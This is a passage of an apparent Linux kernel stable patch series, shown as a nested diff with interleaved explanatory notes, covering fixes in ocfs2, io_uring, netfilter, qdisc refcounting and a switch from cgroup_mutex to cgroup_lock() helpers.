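blocks per segment (a common mkfs.nilfs2 layout) on a 1 TiB device,
i.e. nblocks = 268435456:

	min_block_count = nsegments * 2048
	nsegments      <= 268435456 / 2048 = 131072

so a (possibly corrupted) superblock advertising more than 131072
segments now fails the mount with a clear error instead of letting
later segment arithmetic run past the device or overflow.
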
+diff --git a/fs/ocfs2/file.c b/fs/ocfs2/file.c
+index 4d78e09795179..cae410568bb2e 100644
+--- a/fs/ocfs2/file.c
++++ b/fs/ocfs2/file.c
+@@ -2100,14 +2100,20 @@ static long ocfs2_fallocate(struct file *file, int mode, loff_t offset,
+ 	struct ocfs2_space_resv sr;
+ 	int change_size = 1;
+ 	int cmd = OCFS2_IOC_RESVSP64;
++	int ret = 0;
+ 
+ 	if (mode & ~(FALLOC_FL_KEEP_SIZE | FALLOC_FL_PUNCH_HOLE))
+ 		return -EOPNOTSUPP;
+ 	if (!ocfs2_writes_unwritten_extents(osb))
+ 		return -EOPNOTSUPP;
+ 
+-	if (mode & FALLOC_FL_KEEP_SIZE)
++	if (mode & FALLOC_FL_KEEP_SIZE) {
+ 		change_size = 0;
++	} else {
++		ret = inode_newsize_ok(inode, offset + len);
++		if (ret)
++			return ret;
++	}
+ 
+ 	if (mode & FALLOC_FL_PUNCH_HOLE)
+ 		cmd = OCFS2_IOC_UNRESVSP64;
+diff --git a/fs/ocfs2/super.c b/fs/ocfs2/super.c
+index 0b0e6a1321018..988d1c076861b 100644
+--- a/fs/ocfs2/super.c
++++ b/fs/ocfs2/super.c
+@@ -952,8 +952,10 @@ static void ocfs2_disable_quotas(struct ocfs2_super *osb)
+ 	for (type = 0; type < OCFS2_MAXQUOTAS; type++) {
+ 		if (!sb_has_quota_loaded(sb, type))
+ 			continue;
+-		oinfo = sb_dqinfo(sb, type)->dqi_priv;
+-		cancel_delayed_work_sync(&oinfo->dqi_sync_work);
++		if (!sb_has_quota_suspended(sb, type)) {
++			oinfo = sb_dqinfo(sb, type)->dqi_priv;
++			cancel_delayed_work_sync(&oinfo->dqi_sync_work);
++		}
+ 		inode = igrab(sb->s_dquot.files[type]);
+ 		/* Turn off quotas. This will remove all dquot structures from
+ 		 * memory and so they will be automatically synced to global
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index fff61e6d6d4de..3660ce6a93496 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -1230,6 +1230,18 @@ static inline u16 mlx5_core_max_vfs(const struct mlx5_core_dev *dev)
+ 	return dev->priv.sriov.max_vfs;
+ }
+ 
++static inline int mlx5_lag_is_lacp_owner(struct mlx5_core_dev *dev)
++{
++	/* LACP owner conditions:
++	 * 1) Function is physical.
++	 * 2) LAG is supported by FW.
++	 * 3) LAG is managed by driver (currently the only option).
++	 */
++	return  MLX5_CAP_GEN(dev, vport_group_manager) &&
++		   (MLX5_CAP_GEN(dev, num_lag_ports) > 1) &&
++		    MLX5_CAP_GEN(dev, lag_master);
++}
++
+ static inline int mlx5_get_gid_table_len(u16 param)
+ {
+ 	if (param > 4) {
+diff --git a/include/linux/soc/qcom/llcc-qcom.h b/include/linux/soc/qcom/llcc-qcom.h
+index bc2fb8343a944..af093281e335c 100644
+--- a/include/linux/soc/qcom/llcc-qcom.h
++++ b/include/linux/soc/qcom/llcc-qcom.h
+@@ -57,9 +57,6 @@ struct llcc_slice_desc {
+ /**
+  * struct llcc_edac_reg_data - llcc edac registers data for each error type
+  * @name: Name of the error
+- * @synd_reg: Syndrome register address
+- * @count_status_reg: Status register address to read the error count
+- * @ways_status_reg: Status register address to read the error ways
+  * @reg_cnt: Number of registers
+  * @count_mask: Mask value to get the error count
+  * @ways_mask: Mask value to get the error ways
+@@ -68,9 +65,6 @@ struct llcc_slice_desc {
+  */
+ struct llcc_edac_reg_data {
+ 	char *name;
+-	u64 synd_reg;
+-	u64 count_status_reg;
+-	u64 ways_status_reg;
+ 	u32 reg_cnt;
+ 	u32 count_mask;
+ 	u32 ways_mask;
+@@ -108,7 +102,7 @@ struct llcc_edac_reg_offset {
+ 
+ /**
+  * struct llcc_drv_data - Data associated with the llcc driver
+- * @regmap: regmap associated with the llcc device
++ * @regmaps: regmaps associated with the llcc device
+  * @bcast_regmap: regmap associated with llcc broadcast offset
+  * @cfg: pointer to the data structure for slice configuration
+  * @edac_reg_offset: Offset of the LLCC EDAC registers
+@@ -117,12 +111,11 @@ struct llcc_edac_reg_offset {
+  * @max_slices: max slices as read from device tree
+  * @num_banks: Number of llcc banks
+  * @bitmap: Bit map to track the active slice ids
+- * @offsets: Pointer to the bank offsets array
+  * @ecc_irq: interrupt for llcc cache error detection and reporting
+  * @version: Indicates the LLCC version
+  */
+ struct llcc_drv_data {
+-	struct regmap *regmap;
++	struct regmap **regmaps;
+ 	struct regmap *bcast_regmap;
+ 	const struct llcc_slice_config *cfg;
+ 	const struct llcc_edac_reg_offset *edac_reg_offset;
+@@ -131,7 +124,6 @@ struct llcc_drv_data {
+ 	u32 max_slices;
+ 	u32 num_banks;
+ 	unsigned long *bitmap;
+-	u32 *offsets;
+ 	int ecc_irq;
+ 	u32 version;
+ };
+diff --git a/include/net/neighbour.h b/include/net/neighbour.h
+index 94a1599824d8f..794e45981891a 100644
+--- a/include/net/neighbour.h
++++ b/include/net/neighbour.h
+@@ -336,8 +336,6 @@ void neigh_table_init(int index, struct neigh_table *tbl);
+ int neigh_table_clear(int index, struct neigh_table *tbl);
+ struct neighbour *neigh_lookup(struct neigh_table *tbl, const void *pkey,
+ 			       struct net_device *dev);
+-struct neighbour *neigh_lookup_nodev(struct neigh_table *tbl, struct net *net,
+-				     const void *pkey);
+ struct neighbour *__neigh_create(struct neigh_table *tbl, const void *pkey,
+ 				 struct net_device *dev, bool want_ref);
+ static inline struct neighbour *neigh_create(struct neigh_table *tbl,
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index a1ccf1276f3ee..22e96b7e1b44a 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -457,7 +457,8 @@ struct nft_set_ops {
+ 					       const struct nft_set *set,
+ 					       const struct nft_set_elem *elem,
+ 					       unsigned int flags);
+-
++	void				(*commit)(const struct nft_set *set);
++	void				(*abort)(const struct nft_set *set);
+ 	u64				(*privsize)(const struct nlattr * const nla[],
+ 						    const struct nft_set_desc *desc);
+ 	bool				(*estimate)(const struct nft_set_desc *desc,
+@@ -552,6 +553,7 @@ struct nft_set {
+ 	u16				policy;
+ 	u16				udlen;
+ 	unsigned char			*udata;
++	struct list_head		pending_update;
+ 	/* runtime data below here */
+ 	const struct nft_set_ops	*ops ____cacheline_aligned;
+ 	u16				flags:14,
+diff --git a/include/net/sch_generic.h b/include/net/sch_generic.h
+index 989eb972fcaec..b3e3128402961 100644
+--- a/include/net/sch_generic.h
++++ b/include/net/sch_generic.h
+@@ -137,6 +137,13 @@ static inline void qdisc_refcount_inc(struct Qdisc *qdisc)
+ 	refcount_inc(&qdisc->refcnt);
+ }
+ 
++static inline bool qdisc_refcount_dec_if_one(struct Qdisc *qdisc)
++{
++	if (qdisc->flags & TCQ_F_BUILTIN)
++		return true;
++	return refcount_dec_if_one(&qdisc->refcnt);
++}
++
+ /* Intended to be used by unlocked users, when concurrent qdisc release is
+  * possible.
+  */
+@@ -650,6 +657,7 @@ void dev_deactivate_many(struct list_head *head);
+ struct Qdisc *dev_graft_qdisc(struct netdev_queue *dev_queue,
+ 			      struct Qdisc *qdisc);
+ void qdisc_reset(struct Qdisc *qdisc);
++void qdisc_destroy(struct Qdisc *qdisc);
+ void qdisc_put(struct Qdisc *qdisc);
+ void qdisc_put_unlocked(struct Qdisc *qdisc);
+ void qdisc_tree_reduce_backlog(struct Qdisc *qdisc, int n, int len);
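[qdisc_refcount_dec_if_one() lets the destroy path proceed only when it holds the last reference. The underlying primitive can be sketched with C11 atomics; this is a simplified model of refcount_dec_if_one(), not the kernel's hardened refcount_t:]

    #include <stdatomic.h>
    #include <stdbool.h>

    /* Succeed, and drop to zero, only if the count is exactly 1.
     * On failure the count is untouched, so a concurrent holder keeps
     * the object alive and the caller simply backs off.
     */
    static bool dec_if_one(atomic_int *refcnt)
    {
            int expected = 1;
            return atomic_compare_exchange_strong(refcnt, &expected, 0);
    }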
+diff --git a/include/rdma/ib_addr.h b/include/rdma/ib_addr.h
+index d808dc3d239e8..811a0f11d0dbe 100644
+--- a/include/rdma/ib_addr.h
++++ b/include/rdma/ib_addr.h
+@@ -194,29 +194,6 @@ static inline enum ib_mtu iboe_get_mtu(int mtu)
+ 		return 0;
+ }
+ 
+-static inline int iboe_get_rate(struct net_device *dev)
+-{
+-	struct ethtool_link_ksettings cmd;
+-	int err;
+-
+-	rtnl_lock();
+-	err = __ethtool_get_link_ksettings(dev, &cmd);
+-	rtnl_unlock();
+-	if (err)
+-		return IB_RATE_PORT_CURRENT;
+-
+-	if (cmd.base.speed >= 40000)
+-		return IB_RATE_40_GBPS;
+-	else if (cmd.base.speed >= 30000)
+-		return IB_RATE_30_GBPS;
+-	else if (cmd.base.speed >= 20000)
+-		return IB_RATE_20_GBPS;
+-	else if (cmd.base.speed >= 10000)
+-		return IB_RATE_10_GBPS;
+-	else
+-		return IB_RATE_PORT_CURRENT;
+-}
+-
+ static inline int rdma_link_local_addr(struct in6_addr *addr)
+ {
+ 	if (addr->s6_addr32[0] == htonl(0xfe800000) &&
+diff --git a/include/sound/soc-acpi.h b/include/sound/soc-acpi.h
+index b38fd25c57295..528279056b3ab 100644
+--- a/include/sound/soc-acpi.h
++++ b/include/sound/soc-acpi.h
+@@ -170,6 +170,7 @@ struct snd_soc_acpi_link_adr {
+ /* Descriptor for SST ASoC machine driver */
+ struct snd_soc_acpi_mach {
+ 	u8 id[ACPI_ID_LEN];
++	const char *uid;
+ 	const struct snd_soc_acpi_codecs *comp_ids;
+ 	const u32 link_mask;
+ 	const struct snd_soc_acpi_link_adr *links;
+diff --git a/include/sound/soc-dpcm.h b/include/sound/soc-dpcm.h
+index 5b689c663290f..27a5642f07cda 100644
+--- a/include/sound/soc-dpcm.h
++++ b/include/sound/soc-dpcm.h
+@@ -125,6 +125,10 @@ int snd_soc_dpcm_can_be_free_stop(struct snd_soc_pcm_runtime *fe,
+ int snd_soc_dpcm_can_be_params(struct snd_soc_pcm_runtime *fe,
+ 		struct snd_soc_pcm_runtime *be, int stream);
+ 
++/* can this BE perform prepare */
++int snd_soc_dpcm_can_be_prepared(struct snd_soc_pcm_runtime *fe,
++				 struct snd_soc_pcm_runtime *be, int stream);
++
+ /* is the current PCM operation for this FE ? */
+ int snd_soc_dpcm_fe_can_update(struct snd_soc_pcm_runtime *fe, int stream);
+ 
+diff --git a/include/uapi/linux/ethtool_netlink.h b/include/uapi/linux/ethtool_netlink.h
+index bb57084ac524a..69f5bec347c20 100644
+--- a/include/uapi/linux/ethtool_netlink.h
++++ b/include/uapi/linux/ethtool_netlink.h
+@@ -761,7 +761,7 @@ enum {
+ 
+ 	/* add new constants above here */
+ 	__ETHTOOL_A_STATS_GRP_CNT,
+-	ETHTOOL_A_STATS_GRP_MAX = (__ETHTOOL_A_STATS_CNT - 1)
++	ETHTOOL_A_STATS_GRP_MAX = (__ETHTOOL_A_STATS_GRP_CNT - 1)
+ };
+ 
+ enum {
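[The ethtool_netlink.h change fixes a copy-paste bug: the GRP enum's MAX was derived from a different enum's __..._CNT, so anything sized or bounds-checked by ETHTOOL_A_STATS_GRP_MAX used the wrong count. The idiom in isolation, with generic names:]

    enum {
            STATS_GRP_UNSPEC,
            STATS_GRP_PAD,
            STATS_GRP_ID,
            /* add new constants above here */
            __STATS_GRP_CNT,
            STATS_GRP_MAX = (__STATS_GRP_CNT - 1) /* must use this enum's _CNT */
    };

Netlink policy arrays are typically declared with [..._MAX + 1] entries, which is why a MAX borrowed from an unrelated enum can silently misparse attributes.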
+diff --git a/include/uapi/linux/rtnetlink.h b/include/uapi/linux/rtnetlink.h
+index eb2747d58a813..51c13cf9c5aee 100644
+--- a/include/uapi/linux/rtnetlink.h
++++ b/include/uapi/linux/rtnetlink.h
+@@ -635,6 +635,7 @@ enum {
+ 	TCA_INGRESS_BLOCK,
+ 	TCA_EGRESS_BLOCK,
+ 	TCA_DUMP_FLAGS,
++	TCA_EXT_WARN_MSG,
+ 	__TCA_MAX
+ };
+ 
+@@ -788,6 +789,7 @@ enum {
+ 	TCA_ROOT_FLAGS,
+ 	TCA_ROOT_COUNT,
+ 	TCA_ROOT_TIME_DELTA, /* in msecs */
++	TCA_ROOT_EXT_WARN_MSG,
+ 	__TCA_ROOT_MAX,
+ #define	TCA_ROOT_MAX (__TCA_ROOT_MAX - 1)
+ };
+diff --git a/io_uring/net.c b/io_uring/net.c
+index f6d8b02387a9d..05792a6899944 100644
+--- a/io_uring/net.c
++++ b/io_uring/net.c
+@@ -65,6 +65,7 @@ struct io_sr_msg {
+ 	u16				addr_len;
+ 	u16				buf_group;
+ 	void __user			*addr;
++	void __user			*msg_control;
+ 	/* used only for send zerocopy */
+ 	struct io_kiocb 		*notif;
+ };
+@@ -182,11 +183,15 @@ static int io_sendmsg_copy_hdr(struct io_kiocb *req,
+ 			       struct io_async_msghdr *iomsg)
+ {
+ 	struct io_sr_msg *sr = io_kiocb_to_cmd(req, struct io_sr_msg);
++	int ret;
+ 
+ 	iomsg->msg.msg_name = &iomsg->addr;
+ 	iomsg->free_iov = iomsg->fast_iov;
+-	return sendmsg_copy_msghdr(&iomsg->msg, sr->umsg, sr->msg_flags,
++	ret = sendmsg_copy_msghdr(&iomsg->msg, sr->umsg, sr->msg_flags,
+ 					&iomsg->free_iov);
++	/* save msg_control as sys_sendmsg() overwrites it */
++	sr->msg_control = iomsg->msg.msg_control;
++	return ret;
+ }
+ 
+ int io_send_prep_async(struct io_kiocb *req)
+@@ -284,6 +289,7 @@ int io_sendmsg(struct io_kiocb *req, unsigned int issue_flags)
+ 
+ 	if (req_has_async_data(req)) {
+ 		kmsg = req->async_data;
++		kmsg->msg.msg_control = sr->msg_control;
+ 	} else {
+ 		ret = io_sendmsg_copy_hdr(req, &iomsg);
+ 		if (ret)
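[The io_uring/net.c fix stashes the user's msg_control pointer at prep time because, per the comment in the hunk, the sendmsg path overwrites the field; a retry that reuses cached async data must put it back first. A toy model of the save/restore, with invented struct and function names:]

    struct sr_state   { void *msg_control; }; /* survives across retries   */
    struct kmsg_state { void *msg_control; }; /* clobbered by each attempt */

    static void copy_hdr(struct sr_state *sr, struct kmsg_state *kmsg, void *uctrl)
    {
            kmsg->msg_control = uctrl;           /* stand-in for the msghdr copy  */
            sr->msg_control = kmsg->msg_control; /* save before the send eats it  */
    }

    static void retry_from_cache(const struct sr_state *sr, struct kmsg_state *kmsg)
    {
            kmsg->msg_control = sr->msg_control; /* restore before re-issuing */
    }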
+diff --git a/io_uring/sqpoll.c b/io_uring/sqpoll.c
+index 559652380672c..6ffa5cf1bbb86 100644
+--- a/io_uring/sqpoll.c
++++ b/io_uring/sqpoll.c
+@@ -256,9 +256,13 @@ static int io_sq_thread(void *data)
+ 			sqt_spin = true;
+ 
+ 		if (sqt_spin || !time_after(jiffies, timeout)) {
+-			cond_resched();
+ 			if (sqt_spin)
+ 				timeout = jiffies + sqd->sq_thread_idle;
++			if (unlikely(need_resched())) {
++				mutex_unlock(&sqd->lock);
++				cond_resched();
++				mutex_lock(&sqd->lock);
++			}
+ 			continue;
+ 		}
+ 
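[The sqpoll change drops sqd->lock around cond_resched() so other threads are not blocked for however long the scheduler keeps the poller off-CPU. The same discipline in a minimal userspace sketch:]

    #include <pthread.h>
    #include <sched.h>

    /* caller holds 'lock' on entry and on return */
    static void yield_unlocked(pthread_mutex_t *lock)
    {
            pthread_mutex_unlock(lock); /* never yield while holding the lock */
            sched_yield();
            pthread_mutex_lock(lock);
    }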
+diff --git a/kernel/bpf/cgroup.c b/kernel/bpf/cgroup.c
+index 819f011f0a9cd..b86b907e566ca 100644
+--- a/kernel/bpf/cgroup.c
++++ b/kernel/bpf/cgroup.c
+@@ -173,11 +173,11 @@ void bpf_cgroup_atype_put(int cgroup_atype)
+ {
+ 	int i = cgroup_atype - CGROUP_LSM_START;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	if (--cgroup_lsm_atype[i].refcnt <= 0)
+ 		cgroup_lsm_atype[i].attach_btf_id = 0;
+ 	WARN_ON_ONCE(cgroup_lsm_atype[i].refcnt < 0);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ }
+ #else
+ static enum cgroup_bpf_attach_type
+@@ -282,7 +282,7 @@ static void cgroup_bpf_release(struct work_struct *work)
+ 
+ 	unsigned int atype;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	for (atype = 0; atype < ARRAY_SIZE(cgrp->bpf.progs); atype++) {
+ 		struct hlist_head *progs = &cgrp->bpf.progs[atype];
+@@ -315,7 +315,7 @@ static void cgroup_bpf_release(struct work_struct *work)
+ 		bpf_cgroup_storage_free(storage);
+ 	}
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
+ 		cgroup_bpf_put(p);
+@@ -729,9 +729,9 @@ static int cgroup_bpf_attach(struct cgroup *cgrp,
+ {
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	ret = __cgroup_bpf_attach(cgrp, prog, replace_prog, link, type, flags);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -831,7 +831,7 @@ static int cgroup_bpf_replace(struct bpf_link *link, struct bpf_prog *new_prog,
+ 
+ 	cg_link = container_of(link, struct bpf_cgroup_link, link);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	/* link might have been auto-released by dying cgroup, so fail */
+ 	if (!cg_link->cgroup) {
+ 		ret = -ENOLINK;
+@@ -843,7 +843,7 @@ static int cgroup_bpf_replace(struct bpf_link *link, struct bpf_prog *new_prog,
+ 	}
+ 	ret = __cgroup_bpf_replace(cg_link->cgroup, cg_link, new_prog);
+ out_unlock:
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -1009,9 +1009,9 @@ static int cgroup_bpf_detach(struct cgroup *cgrp, struct bpf_prog *prog,
+ {
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	ret = __cgroup_bpf_detach(cgrp, prog, NULL, type);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -1120,9 +1120,9 @@ static int cgroup_bpf_query(struct cgroup *cgrp, const union bpf_attr *attr,
+ {
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	ret = __cgroup_bpf_query(cgrp, attr, uattr);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -1189,11 +1189,11 @@ static void bpf_cgroup_link_release(struct bpf_link *link)
+ 	if (!cg_link->cgroup)
+ 		return;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	/* re-check cgroup under lock again */
+ 	if (!cg_link->cgroup) {
+-		mutex_unlock(&cgroup_mutex);
++		cgroup_unlock();
+ 		return;
+ 	}
+ 
+@@ -1205,7 +1205,7 @@ static void bpf_cgroup_link_release(struct bpf_link *link)
+ 	cg = cg_link->cgroup;
+ 	cg_link->cgroup = NULL;
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	cgroup_put(cg);
+ }
+@@ -1232,10 +1232,10 @@ static void bpf_cgroup_link_show_fdinfo(const struct bpf_link *link,
+ 		container_of(link, struct bpf_cgroup_link, link);
+ 	u64 cg_id = 0;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	if (cg_link->cgroup)
+ 		cg_id = cgroup_id(cg_link->cgroup);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	seq_printf(seq,
+ 		   "cgroup_id:\t%llu\n"
+@@ -1251,10 +1251,10 @@ static int bpf_cgroup_link_fill_link_info(const struct bpf_link *link,
+ 		container_of(link, struct bpf_cgroup_link, link);
+ 	u64 cg_id = 0;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	if (cg_link->cgroup)
+ 		cg_id = cgroup_id(cg_link->cgroup);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	info->cgroup.cgroup_id = cg_id;
+ 	info->cgroup.attach_type = cg_link->type;
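[Most of the bpf/cgroup.c hunk is mechanical: open-coded mutex_lock(&cgroup_mutex) pairs become cgroup_lock()/cgroup_unlock() accessors, so the cgroup core owns its locking scheme in one place. The pattern, generically:]

    #include <pthread.h>

    static pthread_mutex_t subsys_mutex = PTHREAD_MUTEX_INITIALIZER;

    /* Callers never touch subsys_mutex directly, so its type or scope can
     * change later without editing every call site.
     */
    static inline void subsys_lock(void)   { pthread_mutex_lock(&subsys_mutex); }
    static inline void subsys_unlock(void) { pthread_mutex_unlock(&subsys_mutex); }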
+diff --git a/kernel/bpf/cgroup_iter.c b/kernel/bpf/cgroup_iter.c
+index c187a9e62bdbb..d57ccb02477f8 100644
+--- a/kernel/bpf/cgroup_iter.c
++++ b/kernel/bpf/cgroup_iter.c
+@@ -58,7 +58,7 @@ static void *cgroup_iter_seq_start(struct seq_file *seq, loff_t *pos)
+ {
+ 	struct cgroup_iter_priv *p = seq->private;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	/* cgroup_iter doesn't support read across multiple sessions. */
+ 	if (*pos > 0) {
+@@ -89,7 +89,7 @@ static void cgroup_iter_seq_stop(struct seq_file *seq, void *v)
+ {
+ 	struct cgroup_iter_priv *p = seq->private;
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	/* pass NULL to the prog for post-processing */
+ 	if (!v) {
+diff --git a/kernel/bpf/local_storage.c b/kernel/bpf/local_storage.c
+index 098cf336fae6e..f01ca6f1ee031 100644
+--- a/kernel/bpf/local_storage.c
++++ b/kernel/bpf/local_storage.c
+@@ -333,14 +333,14 @@ static void cgroup_storage_map_free(struct bpf_map *_map)
+ 	struct list_head *storages = &map->list;
+ 	struct bpf_cgroup_storage *storage, *stmp;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	list_for_each_entry_safe(storage, stmp, storages, list_map) {
+ 		bpf_cgroup_storage_unlink(storage);
+ 		bpf_cgroup_storage_free(storage);
+ 	}
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	WARN_ON(!RB_EMPTY_ROOT(&map->root));
+ 	WARN_ON(!list_empty(&map->list));
+diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
+index 52bb5a74a23b9..5407241dbb45f 100644
+--- a/kernel/cgroup/cgroup-v1.c
++++ b/kernel/cgroup/cgroup-v1.c
+@@ -58,7 +58,7 @@ int cgroup_attach_task_all(struct task_struct *from, struct task_struct *tsk)
+ 	struct cgroup_root *root;
+ 	int retval = 0;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	cgroup_attach_lock(true);
+ 	for_each_root(root) {
+ 		struct cgroup *from_cgrp;
+@@ -72,7 +72,7 @@ int cgroup_attach_task_all(struct task_struct *from, struct task_struct *tsk)
+ 			break;
+ 	}
+ 	cgroup_attach_unlock(true);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	return retval;
+ }
+@@ -106,9 +106,9 @@ int cgroup_transfer_tasks(struct cgroup *to, struct cgroup *from)
+ 	if (ret)
+ 		return ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+-	percpu_down_write(&cgroup_threadgroup_rwsem);
++	cgroup_attach_lock(true);
+ 
+ 	/* all tasks in @from are being moved, all csets are source */
+ 	spin_lock_irq(&css_set_lock);
+@@ -144,8 +144,8 @@ int cgroup_transfer_tasks(struct cgroup *to, struct cgroup *from)
+ 	} while (task && !ret);
+ out_err:
+ 	cgroup_migrate_finish(&mgctx);
+-	percpu_up_write(&cgroup_threadgroup_rwsem);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_attach_unlock(true);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -847,13 +847,13 @@ static int cgroup1_rename(struct kernfs_node *kn, struct kernfs_node *new_parent
+ 	kernfs_break_active_protection(new_parent);
+ 	kernfs_break_active_protection(kn);
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	ret = kernfs_rename(kn, new_parent, new_name_str);
+ 	if (!ret)
+ 		TRACE_CGROUP_PATH(rename, cgrp);
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	kernfs_unbreak_active_protection(kn);
+ 	kernfs_unbreak_active_protection(new_parent);
+@@ -1119,7 +1119,7 @@ int cgroup1_reconfigure(struct fs_context *fc)
+ 	trace_cgroup_remount(root);
+ 
+  out_unlock:
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
+@@ -1246,7 +1246,7 @@ int cgroup1_get_tree(struct fs_context *fc)
+ 	if (!ret && !percpu_ref_tryget_live(&ctx->root->cgrp.self.refcnt))
+ 		ret = 1;	/* restart */
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	if (!ret)
+ 		ret = cgroup_do_get_tree(fc);
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 2319946715e0c..36c95626afecc 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1385,7 +1385,7 @@ static void cgroup_destroy_root(struct cgroup_root *root)
+ 	cgroup_favor_dynmods(root, false);
+ 	cgroup_exit_root_id(root);
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	cgroup_rstat_exit(cgrp);
+ 	kernfs_destroy_root(root->kf_root);
+@@ -1619,7 +1619,7 @@ void cgroup_kn_unlock(struct kernfs_node *kn)
+ 	else
+ 		cgrp = kn->parent->priv;
+ 
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	kernfs_unbreak_active_protection(kn);
+ 	cgroup_put(cgrp);
+@@ -1664,7 +1664,7 @@ struct cgroup *cgroup_kn_lock_live(struct kernfs_node *kn, bool drain_offline)
+ 	if (drain_offline)
+ 		cgroup_lock_and_drain_offline(cgrp);
+ 	else
+-		mutex_lock(&cgroup_mutex);
++		cgroup_lock();
+ 
+ 	if (!cgroup_is_dead(cgrp))
+ 		return cgrp;
+@@ -2161,13 +2161,13 @@ int cgroup_do_get_tree(struct fs_context *fc)
+ 		struct super_block *sb = fc->root->d_sb;
+ 		struct cgroup *cgrp;
+ 
+-		mutex_lock(&cgroup_mutex);
++		cgroup_lock();
+ 		spin_lock_irq(&css_set_lock);
+ 
+ 		cgrp = cset_cgroup_from_root(ctx->ns->root_cset, ctx->root);
+ 
+ 		spin_unlock_irq(&css_set_lock);
+-		mutex_unlock(&cgroup_mutex);
++		cgroup_unlock();
+ 
+ 		nsdentry = kernfs_node_dentry(cgrp->kn, sb);
+ 		dput(fc->root);
+@@ -2350,13 +2350,13 @@ int cgroup_path_ns(struct cgroup *cgrp, char *buf, size_t buflen,
+ {
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	spin_lock_irq(&css_set_lock);
+ 
+ 	ret = cgroup_path_ns_locked(cgrp, buf, buflen, ns);
+ 
+ 	spin_unlock_irq(&css_set_lock);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 
+ 	return ret;
+ }
+@@ -2382,7 +2382,7 @@ int task_cgroup_path(struct task_struct *task, char *buf, size_t buflen)
+ 	int hierarchy_id = 1;
+ 	int ret;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	spin_lock_irq(&css_set_lock);
+ 
+ 	root = idr_get_next(&cgroup_hierarchy_idr, &hierarchy_id);
+@@ -2396,7 +2396,7 @@ int task_cgroup_path(struct task_struct *task, char *buf, size_t buflen)
+ 	}
+ 
+ 	spin_unlock_irq(&css_set_lock);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(task_cgroup_path);
+@@ -3107,7 +3107,7 @@ void cgroup_lock_and_drain_offline(struct cgroup *cgrp)
+ 	int ssid;
+ 
+ restart:
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 
+ 	cgroup_for_each_live_descendant_post(dsct, d_css, cgrp) {
+ 		for_each_subsys(ss, ssid) {
+@@ -3121,7 +3121,7 @@ restart:
+ 			prepare_to_wait(&dsct->offline_waitq, &wait,
+ 					TASK_UNINTERRUPTIBLE);
+ 
+-			mutex_unlock(&cgroup_mutex);
++			cgroup_unlock();
+ 			schedule();
+ 			finish_wait(&dsct->offline_waitq, &wait);
+ 
+@@ -4370,9 +4370,9 @@ int cgroup_rm_cftypes(struct cftype *cfts)
+ 	if (!(cfts[0].flags & __CFTYPE_ADDED))
+ 		return -ENOENT;
+ 
+-	mutex_lock(&cgroup_mutex);
++	cgroup_lock();
+ 	ret = cgroup_rm_cftypes_locked(cfts);
+-	mutex_unlock(&cgroup_mutex);
++	cgroup_unlock();
+ 	return ret;
+ }
+ 
